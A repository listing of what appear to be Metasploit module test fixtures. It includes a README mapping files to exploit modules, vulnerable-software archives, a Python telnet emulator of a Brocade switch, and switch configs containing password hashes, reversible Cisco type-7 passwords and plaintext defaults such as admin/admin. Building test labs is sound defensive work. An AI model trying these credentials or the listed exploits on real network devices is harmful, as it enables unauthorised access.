├── .gitattributes
├── NetBSD-7.0.1-amd64.iso
├── Panda_AV_Pro2016_16.1.2.exe
├── README.md
├── WNR2000v3_V1.1.2.10.zip
├── brocade_08.0.30hT311_ic_icx6430.conf
├── brocade_emulator.py
├── brocade_icx6430_nopass.conf
├── brocade_icx6430_pass.conf
├── centreon-2.5.3.tar.gz
├── cisco-2950.config
├── cisco-uc520.config
├── coloradoftp-prime-8.zip
├── enum_brocade.rb
├── ipfire-2.15.i586-full-core82.iso
├── ipfire-2.19.x86_64-full-core100.iso
├── john_vs_hashcat.md
├── juniper_ex2200.config
├── juniper_ex2200_access_denied.config
├── juniper_firmware
│   ├── README.md
│   ├── imagekey.cer
│   └── ssg5ssg20.6.3.0r19.0
├── juniper_ssg5_emulator.py
├── juniper_ssg5_screenos.conf
├── juniper_ssg5_ssh_emulator.py
├── juniper_strings.py
├── netcore
│   ├── README.md
│   ├── netcore_module_check_then_run_sanitized_160525-210525_clean.pcap
│   ├── netcore_module_run_big_endian_sanitized_160525-210552.pcap
│   ├── netcore_module_run_sanitized_160525-210507.pcap
│   └── netcore_python_sanitized_160525-210510_clean.pcap
├── netis_backdoor.py
├── op5-monitor-7.1.9-20160303.tar.gz
├── srsexec
├── sunxi-debug.c
├── test_rsa.key
├── tiki-14.1.tar.gz
└── werkzeug_console.py

/.gitattributes:
--------------------------------------------------------------------------------
*.iso filter=lfs diff=lfs merge=lfs -text
*.tar.gz filter=lfs diff=lfs merge=lfs -text
*.zip filter=lfs diff=lfs merge=lfs -text

--------------------------------------------------------------------------------
/NetBSD-7.0.1-amd64.iso:
--------------------------------------------------------------------------------
version https://git-lfs.github.com/spec/v1
oid sha256:0d5929f8626ad07475bc8ed229c56fc73a2a01efd41f30c2695719989bc00fec
size 389855232

--------------------------------------------------------------------------------
/Panda_AV_Pro2016_16.1.2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/Panda_AV_Pro2016_16.1.2.exe
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Metasploit Module Testing Scripts
This repo contains code required to test some of the Metasploit modules I've helped write.

## brocade_emulator.py
Metasploit Module: [auxiliary/scanner/telnet/brocade_enable_login](https://www.rapid7.com/db/modules/auxiliary/scanner/telnet/brocade_enable_login)

## juniper_ssg5_emulator.py
Metasploit Module: [auxiliary/scanner/ssh/juniper_backdoor.rb](https://www.rapid7.com/db/modules/auxiliary/scanner/ssh/juniper_backdoor)
Also see the juniper_firmware folder for the actual vulnerable firmware.

## werkzeug_console.py
Metasploit Module: [exploit/multi/http/werkzeug_debug_rce](https://www.rapid7.com/db/modules/exploit/multi/http/werkzeug_debug_rce)

## sunxi-debug.c
Metasploit Module: [post/multi/escalate/allwinner_backdoor](https://www.rapid7.com/db/modules/post/multi/escalate/allwinner_backdoor)

## ipfire-2.15.i586-full-core82.iso
Metasploit Module: [exploit/linux/http/ipfire_bashbug_exec](https://www.rapid7.com/db/modules/exploit/linux/http/ipfire_bashbug_exec)

## ipfire-2.19.x86_64-full-core100.iso
Metasploit Module: [exploit/linux/http/ipfire_proxy_exec](https://www.rapid7.com/db/modules/exploit/linux/http/ipfire_proxy_exec)

## op5-monitor-7.1.9-20160303.tar.gz
Metasploit Module: [exploit/linux/http/op5_config_exec](https://www.rapid7.com/db/modules/exploit/linux/http/op5_config_exec)

## centreon-2.5.3.tar.gz
Metasploit Module: [exploit/linux/http/centreon_useralias_exec](https://www.rapid7.com/db/modules/exploit/linux/http/centreon_useralias_exec)

## tiki-14.1.tar.gz
Metasploit Module: [exploit/linux/http/tiki_calendar_exec](https://www.rapid7.com/db/modules/exploit/linux/http/tiki_calendar_exec)

## WNR2000v3_V1.1.2.10.zip
Metasploit Module: [auxiliary/admin/http/netgear_soap_password_extractor](https://www.rapid7.com/db/modules/auxiliary/admin/http/netgear_soap_password_extractor)

## netis_backdoor.py
Metasploit Module: [exploit/linux/misc/netcore_udp_53413_backdoor](https://www.rapid7.com/db/modules/exploit/linux/misc/netcore_udp_53413_backdoor)

## NetBSD-7.0.1-amd64.iso
Metasploit Module: [exploit/unix/local/netbsd_mail_local](https://www.rapid7.com/db/modules/exploit/unix/local/netbsd_mail_local)

## coloradoftp-prime-8.zip
Metasploit Module: []()

## Panda_AV_Pro2016_16.1.2.exe
Metasploit Module: []()

--------------------------------------------------------------------------------
/WNR2000v3_V1.1.2.10.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/WNR2000v3_V1.1.2.10.zip
--------------------------------------------------------------------------------
/brocade_08.0.30hT311_ic_icx6430.conf:
--------------------------------------------------------------------------------
!
Startup-config data location is flash memory
!
Startup configuration:
!
ver 08.0.20T311
!
stack unit 1
  module 1 icx6430-24-port-management-module
  module 2 icx6430-sfp-4port-4g-module
!
!
!
!
!
!
!
!
aaa authentication web-server default local
aaa authentication login default local
enable password-display
enable super-user-password 8 $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.
ip address 2.2.2.2 255.255.255.0 dynamic
ip dns server-address 1.1.1.1
ip default-gateway 1.1.1.1
!
username brocade password 8 $1$f/uxhovU$dST5lNskZCPQe/5QijULi0
username test password 8 $1$qKOcZizM$ySW1EyiUpKSHw9MT4PZ11.
snmp-server community 2 $MlVzZCFAbg== ro
snmp-server community 2 $U2kyXj1k rw
!
!
interface ethernet 1/1/1
 speed-duplex 1000-full-master
!
interface ethernet 1/1/2
 speed-duplex 1000-full-master
!
interface ethernet 1/1/3
 speed-duplex 1000-full-master
!
interface ethernet 1/1/4
 speed-duplex 1000-full-master
!
interface ethernet 1/1/5
 speed-duplex 1000-full-master
!
interface ethernet 1/1/6
 speed-duplex 1000-full-master
!
interface ethernet 1/1/7
 speed-duplex 1000-full-master
!
interface ethernet 1/1/8
 speed-duplex 1000-full-master
!
interface ethernet 1/1/9
 speed-duplex 1000-full-master
!
interface ethernet 1/1/10
 speed-duplex 1000-full-master
!
interface ethernet 1/1/11
 speed-duplex 1000-full-master
!
interface ethernet 1/1/12
 speed-duplex 1000-full-master
!
interface ethernet 1/1/13
 speed-duplex 1000-full-master
!
interface ethernet 1/1/14
 speed-duplex 1000-full-master
!
interface ethernet 1/1/15
 speed-duplex 1000-full-master
!
interface ethernet 1/1/16
 speed-duplex 1000-full-master
!
interface ethernet 1/1/17
 speed-duplex 1000-full-master
!
interface ethernet 1/1/18
 speed-duplex 1000-full-master
!
interface ethernet 1/1/19
 speed-duplex 1000-full-master
!
interface ethernet 1/1/20
 speed-duplex 1000-full-master
!
interface ethernet 1/1/21
 speed-duplex 1000-full-master
!
interface ethernet 1/1/22
 speed-duplex 1000-full-master
!
interface ethernet 1/1/23
 speed-duplex 1000-full-master
 no spanning-tree
!
interface ethernet 1/1/24
 speed-duplex 1000-full-master
 no spanning-tree
!
!
!
!
!
!
!
!
end

--------------------------------------------------------------------------------
/brocade_emulator.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

# code base from http://homepages.ius.edu/jfdoyle/B438/HTML/chatserver4chatserver5Python.htm
# this is a brocade emulator for testing against the Metasploit modules for brocade,
# based on the switch I own.  We've only emulated a few functions (?, show config, enable) and kept some
# features out like tab complete, ? on commands, just to keep this code fairly simple.
# we've also forged in a 'switchversion' command, which will dynamically switch from 7.2 emulation to 7.4 emulation.

import socket
import threading
import string
import time

# prompts
PROMPT = "brocade@FWS624>"
ENABLED_PROMPT = "brocade@FW624#"

# format is ('username','password'):privilege
un_pass_config = {
    ('username', 'password'): '',
    ('ttrogdon', 'ttrogdon'): 5,
    ('dmudd', 'crazypassword'): 4
}
un_pass_running_config = {
    ('TopDogUser', 'mystery'): ''
}


class server(threading.Thread):
    def __init__(self, conn):
        # conn is the (socket, address) tuple returned by accept()
        threading.Thread.__init__(self)
        self.SOCKET, self.ADDRESS = conn
        self.enabled = False
        self.version = "7.2"

    def _send(self, text):
        # sockets carry bytes; latin-1 maps every byte value 1:1 to a character
        self.SOCKET.sendall(text.encode('latin-1'))

    def _recv(self):
        return self.SOCKET.recv(1024).decode('latin-1')

    def run(self):
        lock.acquire()
        vector.append(self)
        lock.release()
        print('Connected ', self.ADDRESS)
        # send the consent banner
        self._send("""Warning Notification!!!
This system is to be used by authorized users only for the purpose of
conducting official company work. Any activities conducted on this system may
be monitored and/or recorded and there is no expectation of privacy while
using this system. All possible abuse and criminal activity may be handed
over to the proper law enforcement officials for investigation and
prosecution. Use of this system implies consent to all of the conditions
stated within this Warning Notification.""")
        while True:
            self._send('\n' + (ENABLED_PROMPT if self.enabled else PROMPT))
            From = self._recv()  # Read from client
            # an empty read means the client closed the connection
            if len(From) <= 0:
                break
            # telnet clients tend to send some binary before giving input to the client to type... so we'll filter that
            if From[0] not in string.printable:
                continue
            From_upper = From.upper().strip()
            if From_upper == 'QUIT' or From_upper == 'LOGOUT':
                self.SOCKET.close()
                break
            elif From_upper == 'EXIT':
                if self.enabled:
                    self.enabled = False
                else:
                    self.SOCKET.close()
                    break
            elif From_upper == 'SWITCHVERSION':
                self.version = "7.4" if self.version == "7.2" else "7.2"
                print("Version is now set to: %s" % (self.version))
            elif From_upper == 'SHOW CONFIG' or From_upper == 'SHOW RUNNING-CONFIG':
                # we want to build our username list part dynamically for the config file to make sure its configurable
                unlist = []
                credToUse = un_pass_config if From_upper == 'SHOW CONFIG' else un_pass_running_config
                for cred in credToUse:
                    un, p = cred
                    if credToUse[cred]:  # we have a permission to add
                        unlist.append("username %s privilege %s password ....." % (un, credToUse[cred]))
                    else:
                        unlist.append("username %s password ....." % (un))
                unlist = "\n".join(unlist)
                if self.version == "7.2":
                    self._send("""!
Startup-config data location is flash memory
!
Startup configuration:
!
ver 07.2.02fT7e1
!
module 1 fwsl00m-24-port-copper-base-module
!
tftp disable
!
!
!
vlan 1 name DEFAULT-VLAN by port
!
vlan 100 by port
!
!
!
!
system-max hw-ip-route-tcam 64
!
!
!
aaa authentication web-server default local
aaa authentication login default local
boot sys fl sec
console timeout 10
enable super-user-password .....
hostname brocade
ip dhcp-server enable
!
ip dhcp-server pool bro
 dns-server 192.168.50.1
 domain-name groupbro
 lease 1 0 0
 network 192.168.50.0 255.255.255.0
!
ip route 0.0.0.0 0.0.0.0 10.210.10.65
!
no ip source-route
logging facility local4
no logging buffered debugging
logging console
no telnet server
telnet server enable vlan 1
%s
password-change any
cdp run
fdp run
snmp-server community ..... ro 15
clock summer-time
clock timezone us Eastern
no web-management hp-top-tools
no web-management http
banner motd ^C
**********************************************^C
**********************************************^C
WARNING .... WARNING .... WARNING^C
You have entered into a restricted site.^C
This system is to be accessed only by^C
specifically authorized personnel. Any^C
unauthorized access or use of this system^C
is strictly prohibited and constitutes a^C
violation of federal, state criminal, and^C
of the United States Code and applicable^C
international laws. Violators will be^C
prosecuted to the fullest extent of the law.^C
logged and/or monitored without further^C
notice, and these logs may be used as^C
evidence in court.^C
**********************************************^C
^C
!
no port bootp
!
!
access-list 15 permit host 10.1.2.32
access-list 15 deny any log
!
!
!
!
ip ssh idle-time 10
!
!
end
""" % (unlist))
                elif self.version == "7.4":
                    self._send("""!
Startup-config data location is flash memory
!
Startup configuration:
!
ver 07.4.00bT311
!
stack unit 1
  module 1 icx6450-24-port-management-module
  module 2 icx6450-sfp-plus-4port-40g-module
!
!
!
!
vlan 1 name DEFAULT-VLAN by port
!
vlan 901 name Test by port
 tagged ethe 1/1/1 to 1/1/12
 untagged ethe 1/1/12 to 1/1/24
!
!
!
!
!
!
!
!
aaa authentication enable default local
aaa authentication login default local
console timeout 10
enable super-user-password .....
enable aaa console
hostname bro-switch
ip address 10.1.2.1 255.255.255.224
no ip dhcp-client enable
%s
no snmp-server

no snmp-server community public ro

no web-management http
banner exec ^C
Warning Notification!!!^C
This system is to be used by authorized users only for the purpose of^C
conducting official company work. Any activities conducted on this system may^C
be monitored and/or recorded and there is no expectation of privacy while^C
using this system. All possible abuse and criminal activity may be handed^C
over to the proper law enforcement officials for investigation and^C
prosecution. Use of this system implies consent to all of the conditions^C
stated within this Warning Notification.^C
^C
!
banner motd require-enter-key
banner motd ^C
Warning Notification!!!^C
This system is to be used by authorized users only for the purpose of^C
conducting official company work. Any activities conducted on this system may^C
be monitored and/or recorded and there is no expectation of privacy while^C
using this system. All possible abuse and criminal activity may be handed^C
over to the proper law enforcement officials for investigation and^C
prosecution. Use of this system implies consent to all of the conditions^C
stated within this Warning Notification.^C
^C
!
banner incoming ^C
Warning Notification!!!^C
This system is to be used by authorized users only for the purpose of^C
conducting official company work. Any activities conducted on this system may^C
be monitored and/or recorded and there is no expectation of privacy while^C
using this system. All possible abuse and criminal activity may be handed^C
over to the proper law enforcement officials for investigation and^C
prosecution. Use of this system implies consent to all of the conditions^C
stated within this Warning Notification.^C
^C
!
ssh access-group 10
interface ethernet 1/1/1
 speed-duplex 1000-full-master
!
interface ethernet 1/1/2
 speed-duplex 1000-full-master
!
interface ethernet 1/1/4
 speed-duplex 1000-full-master
!
!
access-list 10 permit 10.1.2.1 0.0.0.24
access-list 10 deny any log
!
!
!
!
ip ssh timeout 30
ip ssh idle-time 10
!
!
end
""" % (unlist))
            elif From_upper == 'ENABLE':
                self._send("User Name: ")
                un = self._recv()
                if un.strip().upper() == "LOGOUT":
                    break
                print(" Username: %s" % (un.strip()))
                self._send("Password: ")
                pas = self._recv()
                if pas.strip().upper() == "LOGOUT":
                    break
                print(" Password: %s" % (pas.strip()))
                if (un.strip(), pas.strip()) in un_pass_config or (un.strip(), pas.strip()) in un_pass_running_config:
                    self.enabled = True
                else:
                    self._send("Error - Incorrect username or password.")
            elif From_upper == '?':
                self._send("""  enable               Enter Privileged mode
  ping                 Ping IP node
  show                 Display system information
  stop-traceroute      Stop current TraceRoute
  traceroute           TraceRoute to IP Node""")
            elif From_upper == 'SHOW VERSION':
                if self.version == "7.2":
                    self._send("""  Copyright (c) 1996-2010 Brocade Communications Systems, Inc.
    UNIT 1: compiled on Feb 16 2012 at 20:20:31 labeled as FGSL07202f
                (3172304 bytes) from Secondary FGSL07202f.bin
        SW: Version 07.2.02fT7e1
  Boot-Monitor Image size = 416213, Version:05.0.00T7e5 (Fev2)
  HW: Stackable FWS624
==========================================================================
UNIT 1: SL 1: FastIron WS 624 24-port Management Module
         Serial #: AN11111111
         License: FWS_BASE_L3_SOFT_PACKAGE (LID: aaAAAAAAAA)
         P-ENGINE 0: type D814, rev 01
==========================================================================
  400 MHz Power PC processor 8248 (version 130/2014) 66 MHz bus
  512 KB boot flash memory
30720 KB code flash memory
  256 MB DRAM
STACKID 1 system uptime is 2 days 4 hours 25 minutes 10 seconds
The system : started=warm start reloaded=by "reload"
""")
                elif self.version == "7.4":
                    self._send("""  Copyright (c) 1996-2012 Brocade Communications Systems, Inc. All rights reserved.
    UNIT 1: compiled on Oct 3 2012 at 08:42:29 labeled as ICX64S07400b
                (10371776 bytes) from Primary ICX64S07400b.bin
        SW: Version 07.4.00bT311
  Boot-Monitor Image size = 776680, Version:07.4.01T310 (kxz07401)
  HW: Stackable ICX6450-24
==========================================================================
UNIT 1: SL 1: ICX6450-24 24-port Management Module
         Serial #: BAA1111A11A
         License: BASE_SOFT_PACKAGE (LID: aaaAAAAaAAa)
         P-ENGINE 0: type DEF0, rev 01
==========================================================================
UNIT 1: SL 2: ICX6450-SFP-Plus 4port 40G Module
==========================================================================
  800 MHz ARM processor ARMv5TE, 400 MHz bus
65536 KB flash memory
  512 MB DRAM
STACKID 1 system uptime is 78 days 2 hours 54 minutes 7 seconds
The system : started=cold start
""")
            else:
                self._send('Invalid input -> %s\nType ? for a list' % (From))
            print("User Input:", From.replace("\n", ""))
        print('Disconnected ', self.ADDRESS)
        lock.acquire()
        vector.remove(self)
        lock.release()


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
    try:
        s.bind(('', 23))
        break
    except socket.error:
        print("[e] Address in use or permission error, sleeping 30sec then trying again")
        time.sleep(30)
s.listen(4)
vector = []
lock = threading.Lock()
print("Server started")
while True:  # Wait for connection/run server
    server(s.accept()).start()

--------------------------------------------------------------------------------
/brocade_icx6430_nopass.conf:
--------------------------------------------------------------------------------
!
Startup-config data location is flash memory
!
Startup configuration:
!
ver 08.0.20T311
!
stack unit 1
  module 1 icx6430-24-port-management-module
  module 2 icx6430-sfp-4port-4g-module
!
!
!
!
!
!
!
!
aaa authentication web-server default local
aaa authentication login default local
!
enable super-user-password .....
ip address 10.1.1.243 255.0.0.0 dynamic
ip dns server-address 10.1.1.1
ip default-gateway 10.1.1.1
!
username brocade password .....
username test password .....
snmp-server community ..... ro
snmp-server community ..... rw
!
!
interface ethernet 1/1/1
 speed-duplex 1000-full-master
!
interface ethernet 1/1/2
 speed-duplex 1000-full-master
!
interface ethernet 1/1/3
 speed-duplex 1000-full-master
!
interface ethernet 1/1/4
 speed-duplex 1000-full-master
!
interface ethernet 1/1/5
 speed-duplex 1000-full-master
!
interface ethernet 1/1/6
 speed-duplex 1000-full-master
!
interface ethernet 1/1/7
 speed-duplex 1000-full-master
!
interface ethernet 1/1/8
 speed-duplex 1000-full-master
!
interface ethernet 1/1/9
 speed-duplex 1000-full-master
!
interface ethernet 1/1/10
 speed-duplex 1000-full-master
!
interface ethernet 1/1/11
 speed-duplex 1000-full-master
!
interface ethernet 1/1/12
 speed-duplex 1000-full-master
!
interface ethernet 1/1/13
 speed-duplex 1000-full-master
!
interface ethernet 1/1/14
 speed-duplex 1000-full-master
!
interface ethernet 1/1/15
 speed-duplex 1000-full-master
!
interface ethernet 1/1/16
 speed-duplex 1000-full-master
!
interface ethernet 1/1/17
 speed-duplex 1000-full-master
!
interface ethernet 1/1/18
 speed-duplex 1000-full-master
!
interface ethernet 1/1/19
 speed-duplex 1000-full-master
!
interface ethernet 1/1/20
 speed-duplex 1000-full-master
!
interface ethernet 1/1/21
 speed-duplex 1000-full-master
!
interface ethernet 1/1/22
 speed-duplex 1000-full-master
!
interface ethernet 1/1/23
 speed-duplex 1000-full-master
 no spanning-tree
!
interface ethernet 1/1/24
 speed-duplex 1000-full-master
 no spanning-tree
!
!
!
!
!
!
!
!
end

--------------------------------------------------------------------------------
/brocade_icx6430_pass.conf:
--------------------------------------------------------------------------------
!
Startup-config data location is flash memory
!
Startup configuration:
!
ver 08.0.20T311
!
stack unit 1
  module 1 icx6430-24-port-management-module
  module 2 icx6430-sfp-4port-4g-module
!
!
!
!
!
!
!
!
aaa authentication web-server default local
aaa authentication login default local
enable password-display
enable super-user-password 8 $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.
ip address 10.1.1.243 255.0.0.0 dynamic
ip dns server-address 10.1.1.1
ip default-gateway 10.1.1.1
!
username brocade password 8 $1$f/uxhovU$dST5lNskZCPQe/5QijULi0
username test password 8 $1$qKOcZizM$ySW1EyiUpKSHw9MT4PZ11.
snmp-server community 2 $MlVzZCFAbg== ro
snmp-server community 2 $U2kyXj1k rw
!
!
interface ethernet 1/1/1
 speed-duplex 1000-full-master
!
interface ethernet 1/1/2
 speed-duplex 1000-full-master
!
interface ethernet 1/1/3
 speed-duplex 1000-full-master
!
interface ethernet 1/1/4
 speed-duplex 1000-full-master
!
interface ethernet 1/1/5
 speed-duplex 1000-full-master
!
interface ethernet 1/1/6
 speed-duplex 1000-full-master
!
interface ethernet 1/1/7
 speed-duplex 1000-full-master
!
interface ethernet 1/1/8
 speed-duplex 1000-full-master
!
interface ethernet 1/1/9
 speed-duplex 1000-full-master
!
interface ethernet 1/1/10
 speed-duplex 1000-full-master
!
interface ethernet 1/1/11
 speed-duplex 1000-full-master
!
interface ethernet 1/1/12
 speed-duplex 1000-full-master
!
interface ethernet 1/1/13
 speed-duplex 1000-full-master
!
interface ethernet 1/1/14
 speed-duplex 1000-full-master
!
interface ethernet 1/1/15
 speed-duplex 1000-full-master
!
interface ethernet 1/1/16
 speed-duplex 1000-full-master
!
interface ethernet 1/1/17
 speed-duplex 1000-full-master
!
interface ethernet 1/1/18
 speed-duplex 1000-full-master
!
interface ethernet 1/1/19
 speed-duplex 1000-full-master
!
interface ethernet 1/1/20
 speed-duplex 1000-full-master
!
interface ethernet 1/1/21
 speed-duplex 1000-full-master
!
interface ethernet 1/1/22
 speed-duplex 1000-full-master
!
interface ethernet 1/1/23
 speed-duplex 1000-full-master
 no spanning-tree
!
interface ethernet 1/1/24
 speed-duplex 1000-full-master
 no spanning-tree
!
!
!
!
!
!
!
!
end

--------------------------------------------------------------------------------
/centreon-2.5.3.tar.gz:
--------------------------------------------------------------------------------
version https://git-lfs.github.com/spec/v1
oid sha256:8da401a237662a3646d2acf28010047d887ba6d4b9fb2d7b760a26360fafb569
size 14114292

--------------------------------------------------------------------------------
/cisco-2950.config:
--------------------------------------------------------------------------------
Building configuration...

Current configuration : 2279 bytes
!
version 12.1
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname cat2950
!
aaa new-model
enable secret 5 $1$crRb$AJAfWfnDJ6Kf83o.P4RxU0
enable password 7 06160E325F59060B01
!
username encrypted privilege 15 password 7 0824424D1B001503170F
username admin password 0 admin
username cisco password 0 cisco
ip subnet-zero
!
ip domain-name ragegroup
ip ssh time-out 60
ip ssh authentication-retries 3
ip ssh version 2
!
spanning-tree mode pvst
no spanning-tree optimize bpdu transmission
spanning-tree extend system-id
!
!
!
!
interface FastEthernet0/1
!
interface FastEthernet0/2
!
interface FastEthernet0/3
!
interface FastEthernet0/4
!
interface FastEthernet0/5
!
interface FastEthernet0/6
!
interface FastEthernet0/7
!
interface FastEthernet0/8
!
interface FastEthernet0/9
!
interface FastEthernet0/10
!
interface FastEthernet0/11
!
interface FastEthernet0/12
!
interface FastEthernet0/13
!
interface FastEthernet0/14
!
interface FastEthernet0/15
!
interface FastEthernet0/16
!
interface FastEthernet0/17
!
interface FastEthernet0/18
!
interface FastEthernet0/19
!
interface FastEthernet0/20
!
interface FastEthernet0/21
!
interface FastEthernet0/22
!
interface FastEthernet0/23
!
interface FastEthernet0/24
!
interface FastEthernet0/25
!
interface FastEthernet0/26
!
interface FastEthernet0/27
!
interface FastEthernet0/28
!
interface FastEthernet0/29
!
interface FastEthernet0/30
!
interface FastEthernet0/31
!
interface FastEthernet0/32
!
interface FastEthernet0/33
!
interface FastEthernet0/34
!
interface FastEthernet0/35
!
interface FastEthernet0/36
!
interface FastEthernet0/37
!
interface FastEthernet0/38
!
interface FastEthernet0/39
!
interface FastEthernet0/40
!
interface FastEthernet0/41
!
interface FastEthernet0/42
!
interface FastEthernet0/43
!
interface FastEthernet0/44
!
interface FastEthernet0/45
!
interface FastEthernet0/46
!
interface FastEthernet0/47
!
interface FastEthernet0/48
!
interface GigabitEthernet0/1
!
interface GigabitEthernet0/2
!
interface Vlan1
 ip address 192.168.2.238 255.255.255.0
 no ip route-cache
!
ip default-gateway 192.168.2.1
ip http server
!
line con 0
line vty 0 4
 password password
 transport input ssh
line vty 5 15
 password 7 03145A1815182E5E4A
!
!
end

cat2950#

--------------------------------------------------------------------------------
/cisco-uc520.config:
--------------------------------------------------------------------------------
!
! No configuration change since last restart
!
version 12.4
parser config cache interface
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
service internal
service compress-config
service sequence-numbers
!
hostname UC520
!
boot-start-marker
boot-end-marker
!
logging message-counter syslog
enable secret 5 $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
!
aaa new-model
!
!
aaa authentication login default local
!
!
aaa session-id common
clock timezone PST -8
clock summer-time PST recurring
!
crypto pki trustpoint TP-self-signed-2055677031
 enrollment selfsigned
 subject-name cn=IOS-Self-Signed-Certificate-2055677031
 revocation-check none
 rsakeypair TP-self-signed-2055677031
!
!
crypto pki certificate chain TP-self-signed-2055677031
 certificate self-signed 01
  quit
dot11 syslog
ip source-route
ip cef
!
!
65 | ip dhcp relay information trust-all 66 | ip dhcp excluded-address 10.1.1.1 10.1.1.10 67 | ip dhcp excluded-address 192.168.10.1 192.168.10.10 68 | ! 69 | ip dhcp pool phone 70 | network 10.1.1.0 255.255.255.0 71 | default-router 10.1.1.1 72 | option 150 ip 10.1.1.1 73 | ! 74 | ip dhcp pool data 75 | import all 76 | network 192.168.10.0 255.255.255.0 77 | default-router 192.168.10.1 78 | ! 79 | ! 80 | ip inspect name SDM_LOW cuseeme 81 | ip inspect name SDM_LOW dns 82 | ip inspect name SDM_LOW ftp 83 | ip inspect name SDM_LOW h323 84 | ip inspect name SDM_LOW https 85 | ip inspect name SDM_LOW icmp 86 | ip inspect name SDM_LOW imap 87 | ip inspect name SDM_LOW pop3 88 | ip inspect name SDM_LOW netshow 89 | ip inspect name SDM_LOW rcmd 90 | ip inspect name SDM_LOW realaudio 91 | ip inspect name SDM_LOW rtsp 92 | ip inspect name SDM_LOW esmtp 93 | ip inspect name SDM_LOW sqlnet 94 | ip inspect name SDM_LOW streamworks 95 | ip inspect name SDM_LOW tftp 96 | ip inspect name SDM_LOW tcp 97 | ip inspect name SDM_LOW udp router-traffic 98 | ip inspect name SDM_LOW vdolive 99 | ! 100 | no ipv6 cef 101 | ! 102 | stcapp ccm-group 1 103 | stcapp 104 | multilink bundle-name authenticated 105 | ! 106 | ! 107 | trunk group ALL_FXO 108 | max-retry 5 109 | voice-class cause-code 1 110 | hunt-scheme longest-idle 111 | ! 112 | ! 113 | voice call send-alert 114 | voice rtp send-recv 115 | ! 116 | voice service voip 117 | allow-connections h323 to h323 118 | allow-connections h323 to sip 119 | allow-connections sip to h323 120 | allow-connections sip to sip 121 | supplementary-service h450.12 122 | sip 123 | registrar server expires max 600 min 60 124 | no update-callerid 125 | ! 126 | ! 127 | voice class codec 1 128 | codec preference 1 g711ulaw 129 | codec preference 2 g729r8 130 | ! 131 | ! 132 | ! 133 | ! 134 | ! 135 | ! 136 | ! 137 | voice class cause-code 1 138 | no-circuit 139 | ! 140 | ! 141 | ! 142 | ! 143 | ! 
144 | voice register global 145 | mode cme 146 | source-address 10.1.1.1 port 5060 147 | max-dn 56 148 | max-pool 14 149 | ! 150 | ! 151 | voice translation-rule 1000 152 | rule 1 /.*/ // 153 | ! 154 | ! 155 | voice translation-profile nondialable 156 | translate called 1000 157 | ! 158 | ! 159 | voice-card 0 160 | no dspfarm 161 | ! 162 | fax interface-type fax-mail 163 | ! 164 | ! 165 | username cisco privilege 15 secret 5 $1$DaqN$iP32E5WcOOui/H66R63QB0 166 | ! 167 | ! 168 | ! 169 | archive 170 | log config 171 | logging enable 172 | logging size 600 173 | hidekeys 174 | ! 175 | ! 176 | ip tftp source-interface Loopback0 177 | ip ssh time-out 60 178 | ! 179 | ! 180 | ! 181 | interface Loopback0 182 | description $FW_INSIDE$ 183 | ip address 10.1.10.2 255.255.255.252 184 | ip access-group 101 in 185 | ip nat inside 186 | ip virtual-reassembly 187 | ! 188 | interface FastEthernet0/0 189 | description $FW_OUTSIDE$ 190 | ip address dhcp 191 | ip access-group 101 in 192 | ip nat outside 193 | ip inspect SDM_LOW out 194 | ip virtual-reassembly 195 | load-interval 30 196 | duplex auto 197 | speed auto 198 | ! 199 | interface Integrated-Service-Engine0/0 200 | description cue is initialized with default IMAP group 201 | ip unnumbered Loopback0 202 | ip nat inside 203 | ip virtual-reassembly 204 | service-module ip address 10.1.10.1 255.255.255.252 205 | service-module ip default-gateway 10.1.10.2 206 | ! 207 | interface FastEthernet0/1/0 208 | description Phone: 7945 (FCE) 209 | switchport voice vlan 100 210 | macro description cisco-phone 211 | spanning-tree portfast 212 | ! 213 | interface FastEthernet0/1/1 214 | description Phone: 7931 215 | switchport voice vlan 100 216 | macro description cisco-phone 217 | spanning-tree portfast 218 | ! 219 | interface FastEthernet0/1/2 220 | description Phone: 524 221 | switchport voice vlan 100 222 | macro description cisco-phone 223 | spanning-tree portfast 224 | ! 
225 | interface FastEthernet0/1/3 226 | description Phone: 7945 227 | switchport voice vlan 100 228 | macro description cisco-phone 229 | spanning-tree portfast 230 | ! 231 | interface FastEthernet0/1/4 232 | description Uplink: LAN 233 | switchport voice vlan 100 234 | macro description cisco-phone 235 | spanning-tree portfast 236 | ! 237 | interface FastEthernet0/1/5 238 | switchport voice vlan 100 239 | macro description cisco-phone 240 | spanning-tree portfast 241 | ! 242 | interface FastEthernet0/1/6 243 | switchport voice vlan 100 244 | macro description cisco-phone 245 | spanning-tree portfast 246 | ! 247 | interface FastEthernet0/1/7 248 | description VM Controller 249 | switchport voice vlan 100 250 | macro description cisco-phone 251 | spanning-tree portfast 252 | ! 253 | interface FastEthernet0/1/8 254 | switchport mode trunk 255 | switchport voice vlan 100 256 | macro description cisco-switch 257 | ! 258 | interface Vlan1 259 | description $FW_INSIDE$ 260 | ip address 192.168.10.1 255.255.255.0 261 | ip access-group 102 in 262 | ip nat inside 263 | ip virtual-reassembly 264 | ! 265 | interface Vlan100 266 | description $FW_INSIDE$ 267 | ip address 10.1.1.1 255.255.255.0 268 | ip access-group 103 in 269 | ip nat inside 270 | ip virtual-reassembly 271 | ! 272 | ip forward-protocol nd 273 | ip route 10.1.10.1 255.255.255.255 Integrated-Service-Engine0/0 274 | ! 275 | ip http server 276 | ip http authentication local 277 | ip http secure-server 278 | ip http path flash:/gui 279 | ip dns server 280 | ip nat inside source list 1 interface FastEthernet0/0 overload 281 | ! 
